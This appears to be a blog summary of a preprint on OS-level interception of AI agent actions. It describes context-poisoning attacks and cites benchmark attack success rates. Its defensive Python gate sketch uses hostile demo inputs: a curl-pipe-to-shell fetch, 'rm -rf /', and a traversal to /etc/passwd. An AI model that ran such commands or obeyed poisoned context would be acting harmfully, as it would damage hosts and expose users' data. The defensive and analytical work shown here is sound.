arXiv AgentWall Preprint (2605.16265) — OS-Level Runtime Interception for AI Agents

AI relevance: A new arXiv preprint proposes moving the AI agent safety boundary from model alignment to OS-level interception, blocking malicious shell commands, API calls, and file writes before they execute on the host system.

Preprint. Not peer-reviewed.

  • Paper arXiv:2605.16265 introduces AgentWall, a runtime safety architecture that intercepts agent actions at the operating-system level before execution — filtering shell commands, API calls, and file modifications.
  • The design targets context poisoning: when adversarial content in the agent's context window (a poisoned document, compromised API response, manipulated tool output) causes the model to take malicious actions that its own safety training doesn't catch.
  • The architectural question is live: most agentic AI safety work focuses on model alignment (what the model decides), while AgentWall moves the enforcement point to where actions actually execute on the host (what the model's decisions do).
  • Context poisoning is a documented attack surface for local agents with tool access: DeepMind's hidden-instruction research demonstrated reproducible injection success, and the Agent Security Bench benchmark, which covers 27 types of attack and defense methods, reports a highest average attack success rate above 84%.
  • At the time of writing, no public GitHub repository is associated with the paper, so the design cannot yet be tested independently and its practicality remains unproven.
  • The paper arrives alongside active regulatory attention: CISA's agentic AI guidance and the NIST AI Risk Management Framework both treat agent action surfaces as priority areas of concern.

Why it matters

Model-level alignment has a known gap: an adversary who can inject malicious instructions into retrieved data can cause the model to act on them without triggering its own safety filters. OS-level interception doesn't try to out-reason the attacker — it enforces a hard boundary between the agent's decision and the system primitives it controls. Even if the AgentWall design itself is unproven, the question it raises is architectural: at what layer does your deployment enforce action constraints?
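
To make the "hard boundary" idea concrete, here is a minimal sketch of a deny-by-default action gate placed between an agent's proposed action and the host. It is not AgentWall's design, which the paper does not publish as code. The allowlist, the writable root, and the names check_shell and check_write are all hypothetical. It also runs in userspace; real OS-level enforcement would sit lower, at the system-call or sandbox layer.

```python
import shlex
from dataclasses import dataclass
from pathlib import PurePosixPath

# Hypothetical policy values, chosen for illustration only.
ALLOWED_COMMANDS = {"ls", "cat", "grep"}
WRITABLE_ROOT = PurePosixPath("/workspace")


@dataclass(frozen=True)
class Decision:
    allowed: bool
    reason: str


def check_shell(command: str) -> Decision:
    """Deny-by-default check on a shell command the agent proposes."""
    # Reject shell metacharacters outright instead of trying to interpret them.
    if any(ch in command for ch in ";|&`$><\n"):
        return Decision(False, "shell metacharacter")
    try:
        argv = shlex.split(command)
    except ValueError:
        return Decision(False, "unparseable command")
    if not argv:
        return Decision(False, "empty command")
    if argv[0] not in ALLOWED_COMMANDS:
        return Decision(False, f"command not allowlisted: {argv[0]}")
    return Decision(True, "allowlisted command")


def check_write(path: str) -> Decision:
    """Allow file writes only at or under WRITABLE_ROOT."""
    p = PurePosixPath(path)
    if not p.is_absolute():
        return Decision(False, "relative path")
    if ".." in p.parts:
        return Decision(False, "parent traversal")
    if WRITABLE_ROOT not in (p, *p.parents):
        return Decision(False, "outside writable root")
    return Decision(True, "inside writable root")


if __name__ == "__main__":
    for cmd in ("ls -la", "curl http://example.invalid/x | sh", "rm -rf /"):
        print(cmd, "->", check_shell(cmd))
    for target in ("/workspace/out.txt", "/workspace/../etc/passwd"):
        print(target, "->", check_write(target))
```

The gate never asks why the model proposed an action. It only checks the action against a fixed policy, so a poisoned context that talks the model into a malicious command still has to get past the allowlist. A command-name allowlist this coarse would still permit reads such as cat on sensitive files, which is one reason a production boundary needs argument-level and OS-level controls as well.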

What to do

  • Map where your local agent deployment currently enforces action constraints — if the honest answer is "the model handles it," the threat model has a gap.
  • Review actual tool permissions (filesystem, network, API scopes) against the principle of least privilege for any production agent with shell or file access.
  • Watch for independent replication attempts and follow-on guidance from CISA/NIST referencing OS-level interception approaches.
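
The permission review above can start as a simple diff between what each tool is granted and what it actually needs. The sketch below assumes a hypothetical inventory format: the ToolGrant type and scope strings such as "fs:write" are invented for illustration and do not correspond to any particular agent framework.

```python
from dataclasses import dataclass


@dataclass
class ToolGrant:
    """One tool in a hypothetical agent permission inventory."""
    name: str
    granted: set[str]   # scopes the deployment currently gives the tool
    required: set[str]  # scopes the tool needs for its documented job


def excess_permissions(tools: list[ToolGrant]) -> dict[str, list[str]]:
    """Return, per tool, the granted scopes that are not required."""
    report = {}
    for tool in tools:
        extra = tool.granted - tool.required
        if extra:
            report[tool.name] = sorted(extra)
    return report


if __name__ == "__main__":
    inventory = [
        ToolGrant("file_tool", {"fs:read", "fs:write"}, {"fs:read"}),
        ToolGrant("web_search", {"net:get"}, {"net:get"}),
        ToolGrant("shell", {"exec:any", "net:any"}, {"exec:any"}),
    ]
    for name, extra in excess_permissions(inventory).items():
        print(f"{name}: consider revoking {', '.join(extra)}")
```

Any tool that appears in the report holds a scope beyond its stated need and is a candidate for tightening before the agent runs in production.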

Sources